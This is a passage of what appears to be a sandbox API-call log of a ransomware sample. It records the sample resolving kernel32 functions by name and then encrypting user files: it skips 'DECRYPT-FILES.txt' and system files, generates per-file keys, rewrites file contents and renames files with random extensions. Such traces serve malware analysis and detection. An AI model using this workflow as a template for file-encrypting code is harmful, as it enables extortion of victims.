returned="DelayLoadFailureHook" [0185.622] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.622] lstrlenA (lpString="DELETEATOM") returned 10 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.622] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.622] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.622] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.622] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.623] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.623] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.623] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.623] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.623] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.623] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.623] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.623] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.623] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.623] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.623] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.623] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.623] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.623] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.623] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.623] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.623] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.623] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.624] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.624] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.624] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.624] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.624] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.624] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.624] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.624] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.624] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.624] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.624] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.624] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.624] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.624] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.624] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.624] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.624] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.624] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.624] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.625] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.625] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.625] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.625] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE") returned 79 [0185.625] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE.5y4x") returned 84 [0185.625] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.8noe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE.5y4x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.8noe.5y4x"), dwFlags=0x0) returned 1 [0185.626] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.626] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.626] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.626] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaeee1860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url.BhG1b", cAlternateFileName="MSNMON~1.BHG")) returned 1 [0185.626] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="DECRYPT-FILES.txt") returned 1 [0185.626] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="autorun.inf") returned 1 [0185.626] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="boot.ini") returned 1 [0185.626] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="desktop.ini") returned 1 [0185.626] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="ntuser.dat") returned -1 [0185.626] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="iconcache.db") returned 1 [0185.626] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="bootsect.bak") returned 1 [0185.627] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="ntuser.dat.log") returned -1 [0185.627] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="thumbs.db") returned -1 [0185.627] lstrcmpiW (lpString1="MSN Money.url.BhG1b", lpString2="Bootfont.bin") returned 1 [0185.627] lstrlenW (lpString="MSN Money.url.BhG1b") returned 19 [0185.627] lstrcmpiW (lpString1="BhG1b", lpString2="lnk") returned -1 [0185.627] lstrcmpiW (lpString1="BhG1b", lpString2="exe") returned -1 [0185.627] lstrcmpiW (lpString1="BhG1b", lpString2="sys") returned -1 [0185.627] lstrcmpiW (lpString1="BhG1b", lpString2="dll") returned -1 [0185.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.627] lstrlenW (lpString="MSN Money.url.BhG1b") returned 19 [0185.627] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.627] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Money.url.BhG1b" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b" [0185.627] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.bhg1b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.628] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.628] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.629] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.629] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.629] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.629] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.629] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.629] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.630] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.630] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.630] CloseHandle (hObject=0x268) returned 1 [0185.630] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.630] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.631] CloseHandle (hObject=0x0) returned 0 [0185.631] CloseHandle (hObject=0x264) returned 1 [0185.631] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.632] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.632] GetTickCount () returned 0x1135a51 [0185.632] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.632] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.632] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.632] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.633] lstrlenA (lpString="kernel32.dll") returned 12 [0185.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.633] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.633] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.633] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.633] lstrlenA (lpString="ADDATOMA") returned 8 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.633] lstrlenA (lpString="ADDATOMW") returned 8 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.633] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.633] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.633] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.633] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.633] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.633] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.633] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.633] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.633] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.634] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.634] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.634] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.634] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.634] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.634] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.634] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.634] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.634] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.634] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.634] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.634] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.634] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.634] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.634] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.634] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.634] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.634] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.634] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.635] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.635] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.635] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.635] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.635] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.635] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.635] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.635] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.635] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.635] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.635] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.635] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.635] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.635] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.635] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 